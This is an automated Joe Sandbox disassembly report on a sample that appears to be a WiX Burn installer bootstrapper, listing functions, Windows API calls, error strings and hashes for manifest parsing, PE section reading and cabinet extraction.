Instruction ID: dcbab945f11b0a9fa84066fa606ef371a75617d7f50396e3eaf57459ab2b2855
Opcode Fuzzy Hash: f795d671d4dd6ab4adf416573ac22be3e4b6fe5cdfa04123e8ccf831badc4d44
Instruction Fuzzy Hash: 35214F7190021DABEF20DFA8DC49BDEBFBABB45710F55411AEA10B6281E7705904DBA4

Function 005AA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to copy working folder., xrefs: 005AA116
Failed to calculate working folder to ensure it exists., xrefs: 005AA0D8
Failed create working folder., xrefs: 005AA0EE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: be3e1dd82163c1124b21b7a7a6ec976244dacfdf387f75aa5003995867c0635d
Instruction ID: 4811bcfca9a9742bdb548ad1fb306132eef9ff928af18ba1773962149289cf4a
Opcode Fuzzy Hash: be3e1dd82163c1124b21b7a7a6ec976244dacfdf387f75aa5003995867c0635d
Instruction Fuzzy Hash: 9D01FC32901565FB8F325B55DD0AC5E7F75FF95760B104256F80076210DB319F00F691

Function 005C48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,005C48AE,00000000,005F7F08,0000000C,005C4A05,00000000,00000002,00000000), ref: 005C48F9
TerminateProcess.KERNEL32(00000000,?,005C48AE,00000000,005F7F08,0000000C,005C4A05,00000000,00000002,00000000), ref: 005C4900
ExitProcess.KERNEL32 ref: 005C4912

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4a03693f229b41a219a6b7ffe1431b8176cc3f38c5ede73ee01086ce9293c3c6
Instruction ID: 9399b59ceb53fa2b0345879c7d44e3efb81780bf51c85432a50039318953fc33
Opcode Fuzzy Hash: 4a03693f229b41a219a6b7ffe1431b8176cc3f38c5ede73ee01086ce9293c3c6
Instruction Fuzzy Hash: C7E04635401258EFCF21AF90CD18E5A3F2AFF94381F01401AF8098A132CB35DC82EE80

Function 0059394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b9ce2aea085ba0ed4445ec580204f18056b5d096bfb0f71ad2dae9cc65901ef0
Instruction ID: d47b3a8141b35e2874a80c632423495402cf97c4a1b20875ec67467bbeb492aa
Opcode Fuzzy Hash: b9ce2aea085ba0ed4445ec580204f18056b5d096bfb0f71ad2dae9cc65901ef0
Instruction Fuzzy Hash: E6C0123219420DE7CB005FF4DC0DC5637ADB724602B048406B505C2110C738E114D760

Function 0059DF33 Relevance: 128.4, APIs: 11, Strings: 62, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 0059E058
SysFreeString.OLEAUT32(00000000), ref: 0059E736

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

Strings

Failed to get package node count., xrefs: 0059E0B1
always, xrefs: 0059E1A7
RollbackBoundaryForward, xrefs: 0059E2DF
Failed to allocate memory for rollback boundary structs., xrefs: 0059DFCA
Failed to select rollback boundary nodes., xrefs: 0059DF69
Failed to find backward transaction boundary: %ls, xrefs: 0059E51D
Failed to parse MSP package., xrefs: 0059E531
Failed to get @Permanent., xrefs: 0059E6BF
clbcatq.dll, xrefs: 0059E219
RollbackBoundaryBackward, xrefs: 0059E319
Failed to find forward transaction boundary: %ls, xrefs: 0059E506
wininet.dll, xrefs: 0059E25A
msi.dll, xrefs: 0059E1C8
MsuPackage, xrefs: 0059E406
Failed to get next node., xrefs: 0059E708
LogPathVariable, xrefs: 0059E276
Failed to get @CacheId., xrefs: 0059E6DB
Failed to get @RollbackLogPathVariable., xrefs: 0059E4EF
MspPackage, xrefs: 0059E3CD
Failed to get @Vital., xrefs: 0059E6B8
ExePackage, xrefs: 0059E357
RollbackLogPathVariable, xrefs: 0059E299
Failed to allocate memory for patch sequence information to package lookup., xrefs: 0059E570
Failed to allocate memory for MSP patch sequence information., xrefs: 0059E4DB
Vital, xrefs: 0059E027, 0059E25B
Failed to allocate memory for package structs., xrefs: 0059E0EF
Failed to get @InstallCondition., xrefs: 0059E4F9
Failed to select package nodes., xrefs: 0059E094
Cache, xrefs: 0059E14B
InstallCondition, xrefs: 0059E2BC
Invalid cache type: %ls, xrefs: 0059E6EA
cabinet.dll, xrefs: 0059E1FE
crypt32.dll, xrefs: 0059E2BB
RollbackBoundary, xrefs: 0059DF56
Failed to parse payload references., xrefs: 0059E6B1
Failed to get @PerMachine., xrefs: 0059E6C6
Failed to get @Size., xrefs: 0059E6D4
feclient.dll, xrefs: 0059E298
Failed to parse dependency providers., xrefs: 0059E6AA
Failed to get @RollbackBoundaryForward., xrefs: 0059E510
ETY, xrefs: 0059DF33
Failed to get @Id., xrefs: 0059E701
Failed to parse EXE package., xrefs: 0059E389
MsiPackage, xrefs: 0059E395
Failed to get @RollbackBoundaryBackward., xrefs: 0059E527
`Dv, xrefs: 0059E058, 0059E47B, 0059E736
Failed to parse target product codes., xrefs: 0059E69B
Failed to get @InstallSize., xrefs: 0059E6CD
comres.dll, xrefs: 0059E234
Failed to parse MSI package., xrefs: 0059E3C1
package.cpp, xrefs: 0059DFBE, 0059E0E3, 0059E4CF, 0059E564
Failed to get rollback bundary node count., xrefs: 0059DF8E
yes, xrefs: 0059E187
Permanent, xrefs: 0059E235
PerMachine, xrefs: 0059E21A
Failed to get @LogPathVariable., xrefs: 0059E4E5
CacheId, xrefs: 0059E1C9
InstallSize, xrefs: 0059E1FF
Size, xrefs: 0059E1E4
Failed to get @Cache., xrefs: 0059E6FA
Failed to parse MSU package., xrefs: 0059E53B
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 0059E081

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ETY$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`Dv$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-666019574
Opcode ID: a676e85719959b4b5c8c3fb522e84ab99e7451b976a03c89111d35f0a8dbf54b
Instruction ID: 26244952ff58cfb9a1b9fa5f4b3e972e4efddbaf7f72a8bd975b71759f2de1c6
Opcode Fuzzy Hash: a676e85719959b4b5c8c3fb522e84ab99e7451b976a03c89111d35f0a8dbf54b
Instruction Fuzzy Hash: 5332AC31D40226EBDF25DF94CC46BAEBFB4BB04720F214666E915BB2D1D7B0AD409B90

Function 0059F9E3 Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @HelpTelephone., xrefs: 0059FC29
Failed to select ARP node., xrefs: 0059FB4F
clbcatq.dll, xrefs: 0059FA56
Failed to get @Tag., xrefs: 0059FA6A
Failed to parse related bundles, xrefs: 0059FA83
Publisher, xrefs: 0059FBC8
Arp, xrefs: 0059FB33
Tag, xrefs: 0059FA57
Failed to get @HelpLink., xrefs: 0059FC04
Failed to set registration paths., xrefs: 0059FF08
registration.cpp, xrefs: 0059FD87
Failed to get @Comments., xrefs: 0059FCC0
Failed to get @Register., xrefs: 0059FB70
Classification, xrefs: 0059FEE2
msasn1.dll, xrefs: 0059FA35
UpdateUrl, xrefs: 0059FC5C
Department, xrefs: 0059FE77
Register, xrefs: 0059FB5D
HelpTelephone, xrefs: 0059FC12
DisableModify, xrefs: 0059FCF6
Manufacturer, xrefs: 0059FE53
Failed to get @Name., xrefs: 0059FED4
Failed to get @ExecutableName., xrefs: 0059FB07
Failed to get @Department., xrefs: 0059FE8E
Failed to get @Version., xrefs: 0059FAA4
Failed to parse software tag., xrefs: 0059FE10
Failed to get @DisableRemove., xrefs: 0059FDE0
ParentDisplayName, xrefs: 0059FC81
ProviderKey, xrefs: 0059FAD3
Failed to get @Classification., xrefs: 0059FEF5
AboutUrl, xrefs: 0059FC37
Failed to parse @Version: %ls, xrefs: 0059FAC5
Failed to select Update node., xrefs: 0059FE3C
Failed to get @PerMachine., xrefs: 0059FB25
ExecutableName, xrefs: 0059FAF4
Registration, xrefs: 0059F9FD
HelpLink, xrefs: 0059FBED
Failed to get @DisableModify., xrefs: 0059FDB8
Failed to select registration node., xrefs: 0059FA1C
Failed to get @ProviderKey., xrefs: 0059FAE6
Invalid modify disabled type: %ls, xrefs: 0059FD94
ProductFamily, xrefs: 0059FE9C
button, xrefs: 0059FD15
Comments, xrefs: 0059FCA9
ETY, xrefs: 0059F9E3
Failed to get @Id., xrefs: 0059FA49
Name, xrefs: 0059FEC1
Version, xrefs: 0059FA91
Update, xrefs: 0059FE1E
DisplayName, xrefs: 0059FB7E
DisplayVersion, xrefs: 0059FBA3
Failed to get @DisplayVersion., xrefs: 0059FBBA
Failed to get @UpdateUrl., xrefs: 0059FC73
Failed to get @Manufacturer., xrefs: 0059FE66
yes, xrefs: 0059FD36
PerMachine, xrefs: 0059FB12
Failed to get @ProductFamily., xrefs: 0059FEB3
Failed to get @ParentDisplayName., xrefs: 0059FC98
Failed to get @Contact., xrefs: 0059FCE8
DisableRemove, xrefs: 0059FDC9
Contact, xrefs: 0059FCD1
Failed to get @DisplayName., xrefs: 0059FB95
Failed to get @AboutUrl., xrefs: 0059FC4E
Failed to get @Publisher., xrefs: 0059FBDF

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ETY$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 760788290-2736796440
Opcode ID: b413c59a2b2099f2a24215e7cca9f32511f8c918510c6a7e7f62f8ec07fe43f7
Instruction ID: a2bcd57a996b60e1fc41496a287129b459dbb771d402d925efed9d2880c1b7a7
Opcode Fuzzy Hash: b413c59a2b2099f2a24215e7cca9f32511f8c918510c6a7e7f62f8ec07fe43f7
Instruction Fuzzy Hash: F8E11632E44AA6BBCF259AA5CC46EADBEA4BB05710F150672FD51F7290C7709E4097C0

Function 0059B48B Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 0059B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B550
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 0059B556
ReadFile.KERNELBASE(00000000,aDYH,00000040,?,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B59E
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 0059B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B7BD

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B906

Strings

Failed to get total size of bundle., xrefs: 0059BA23
(, xrefs: 0059B81D
.wix, xrefs: 0059B830
Failed to allocate memory for container sizes., xrefs: 0059BAD3
Failed to read DOS header., xrefs: 0059B5CF
Failed to seek to start of file., xrefs: 0059B581
Failed to read section info, unsupported version: %08x, xrefs: 0059B9F5
Failed to allocate buffer for section info., xrefs: 0059B8E4
Failed to read complete section info., xrefs: 0059B9C5
Failed to read signature offset., xrefs: 0059B747
4, xrefs: 0059B884
Failed to read section info, data to short: %u, xrefs: 0059B8AA
Failed to seek to NT header., xrefs: 0059B632
aDYH, xrefs: 0059B4A2, 0059B598, 0059B5EB, 0059B4AC, 0059B59B
Failed to read NT header., xrefs: 0059B681
Failed to read complete image section header, index: %u, xrefs: 0059BB75
Failed to find Burn section., xrefs: 0059BB32
Failed to seek to section info., xrefs: 0059B6F8, 0059B934
section.cpp, xrefs: 0059B523, 0059B577, 0059B5C5, 0059B628, 0059B677, 0059B6EE, 0059B73D, 0059B78C, 0059B7E1, 0059B898, 0059B8D8, 0059B92A, 0059B98F, 0059B9B9, 0059B9E0, 0059BAC7, 0059BB07, 0059BB26, 0059BB63, 0059BBA1, 0059BBC4, 0059BBDF
PE Header from file didn't match PE Header in memory., xrefs: 0059BB11
Failed to open handle to user process path., xrefs: 0059B52D
Failed to find valid NT image header in buffer., xrefs: 0059BBD0
Failed to read section info., xrefs: 0059B999
burn, xrefs: 0059B838
Failed to find valid DOS image header in buffer., xrefs: 0059BBEB
Failed to read signature size., xrefs: 0059B796
PE, xrefs: 0059B698
Failed to seek past optional headers., xrefs: 0059B7EB
Failed to read image section header, index: %u, xrefs: 0059BBAC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aDYH$burn$section.cpp
API String ID: 3411815225-4184568015
Opcode ID: e0a1ff054f5fdb22436d190805f83330a6c7a5f5a5fe1f1f788ecc44da176a80
Instruction ID: 1e16a3457f58a7742a5b1e2c260316019fbbdaea16ab59791f10c54ae2fea095
Opcode Fuzzy Hash: e0a1ff054f5fdb22436d190805f83330a6c7a5f5a5fe1f1f788ecc44da176a80
Instruction Fuzzy Hash: 5312B476941235EBFF309A589D4AFAA7F68FB44B50F0142A6FD04AB281E7709D40DBD0

Function 005B0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,005B08BC,?,?), ref: 005B0D25
GetLastError.KERNEL32(?,?,?,?,005B08BC,?,?), ref: 005B0D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,005B08BC,?,?), ref: 005B0D74
GetLastError.KERNEL32(?,?,?,?,005B08BC,?,?), ref: 005B0D7F
ResetEvent.KERNEL32(?,?,?,?,?,005B08BC,?,?), ref: 005B0DB7
GetLastError.KERNEL32(?,?,?,?,005B08BC,?,?), ref: 005B0DC1

Strings

Invalid operation for this state., xrefs: 005B0E1D
Failed to copy stream name: %ls, xrefs: 005B0E50
Failed to set operation complete event., xrefs: 005B0D5D, 005B0E9E
Failed to set file pointer to end of file., xrefs: 005B104F
Failed to allocate buffer for stream., xrefs: 005B0F93
cabextract.cpp, xrefs: 005B0D53, 005B0DA3, 005B0DE5, 005B0E11, 005B0E94, 005B0EDC, 005B0F21, 005B0F89, 005B0FF4, 005B1045, 005B108A, 005B10CE
Failed to create file: %ls, xrefs: 005B1001
Failed to set end of file., xrefs: 005B1094
Failed to wait for begin operation event., xrefs: 005B0DAD, 005B0EE6
Failed to reset begin operation event., xrefs: 005B0DEF, 005B0F2B
Failed to set file pointer to beginning of file., xrefs: 005B10D8

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 3982b546547d6520ce1c428939a0b5926b756c68a2ed71674bb94a65099ab3df
Instruction ID: 1d494a99a1a8bc69a479b100714b5118ced74ec6de456ee59c8312090defa5ea
Opcode Fuzzy Hash: 3982b546547d6520ce1c428939a0b5926b756c68a2ed71674bb94a65099ab3df
Instruction Fuzzy Hash: 8C911937A82A76B7E73416B54D0EBAB2E54BF04B60F224616FE50BE2C0D751FC0096D5

Function 00594D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005933C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,005910DD,?,00000000), ref: 005933E8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00594F40
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00594F4F
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00594F5E
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00594F69

Strings

burn.filehandle.attached, xrefs: 00594E17
burn.filehandle.self, xrefs: 00594E45
user.cpp, xrefs: 00594EEA
Failed to allocate parameters for unelevated process., xrefs: 00594DFA
Failed to cache to clean room., xrefs: 00594DC2
-%ls="%ls", xrefs: 00594DE6
burn.clean.room, xrefs: 00594DDE
Failed to append original command line., xrefs: 00594E69
Failed to launch clean room process: %ls, xrefs: 00594EF7
Failed to append %ls, xrefs: 00594E1C
D, xrefs: 00594EA9
Failed to wait for clean room process: %ls, xrefs: 00594F23
%ls %ls, xrefs: 00594E55
Failed to get path for current process., xrefs: 00594D83
Failed to allocate full command-line., xrefs: 00594E8E
"%ls" %ls, xrefs: 00594E7A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3884789274-2391192076
Opcode ID: 630829fff30f749acb15036c1ac4e9cef72124139fa81c95dd6fc9effab1b386
Instruction ID: 1d17d73bd48d05b6fa544159dae06390a0373d747ecaee501abce31f8f59ee30
Opcode Fuzzy Hash: 630829fff30f749acb15036c1ac4e9cef72124139fa81c95dd6fc9effab1b386
Instruction Fuzzy Hash: 08717172D0122AEBDF219A98CC45EEEBF78BF44720F114217F910B6291D7349E029BA1

Function 005A752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WixBundleSourceProcessFolder, xrefs: 005A7734
Failed to get unique temporary folder for bootstrapper application., xrefs: 005A77CE
Failed to get manifest stream from container., xrefs: 005A75CC
WixBundleElevated, xrefs: 005A76A5, 005A76B6
Failed to get source process folder from path., xrefs: 005A7725
Failed to set original source variable., xrefs: 005A776A
WixBundleOriginalSource, xrefs: 005A7759
Failed to open attached UX container., xrefs: 005A758E
Failed to overwrite the %ls built-in variable., xrefs: 005A76BB
Failed to load manifest., xrefs: 005A75E8
Failed to extract bootstrapper application payloads., xrefs: 005A77EF
Failed to open manifest stream., xrefs: 005A75AB
Failed to set source process path variable., xrefs: 005A7709
Failed to load catalog files., xrefs: 005A780F
WixBundleSourceProcessPath, xrefs: 005A76F8
Failed to initialize internal cache functionality., xrefs: 005A779F
Failed to set source process folder variable., xrefs: 005A7745
